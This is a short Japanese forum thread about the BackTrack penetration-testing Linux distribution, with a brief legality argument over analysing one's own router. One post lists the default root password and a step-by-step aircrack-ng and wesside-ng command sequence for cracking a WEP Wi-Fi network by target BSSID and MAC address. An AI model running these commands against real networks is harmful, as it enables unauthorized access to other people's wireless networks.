1 名前:login:Penguin [2009/01/26(月) 21:11:41 ID:g4lC0dUX] 侵入テストの分野に特化した、Linuxディストリビューションです。 2つのディストリビューションWHAXとAuditor Security Collectionが融合し ペネトレーションテスト用に設計・開発されました。 BackTrack公式サイト ttp://www.remote-exploit.org/backtrack.html Forum ttp://forums.remote-exploit.org BackTrack Wiki ttp://backtrack.offensive-security.com/ 前スレ BackTrackスレ pc11.2ch.net/test/read.cgi/linux/1230103140/
964 名前:login:Penguin mailto:sage [2012/04/23(月) 11:37:50.45 ID:Aqxx5kmZ] 解析した時点でアウトなんだな
965 名前:login:Penguin mailto:sage [2012/04/28(土) 17:35:11.50 ID:x8O8s7ZM] --TIPS ログイン ユーザー名:root Passwd:toor GUIの起動 > startx ネットワークを有効にする > start-network ctrl+cで止め airmon-ng start? wlan0 airodump-ng mon0 airodump-ng -w wep -c [CHANNEL] -b [BSSID] mon0 aireplay-ng -1 0 -a [BSSID] mon0 aireplay-ng -3 -b [BSSID] mon0 aircrack-ng wep-01.cap # airmon-ng start wlan1(←デバイス名) で、クラックさせたいデバイスをモニタモードします。モニタモードになったら #wesside-ng -i mon0 (←デバイス名)-v 00:11:22:33:44:55(←ターゲットのMACアドレス)
966 名前:login:Penguin mailto:sage [2012/05/01(火) 12:05:38.56 ID:WUjZJd7G] >>964 自分のルータを解析しただけなのに違法とかどういう事なの?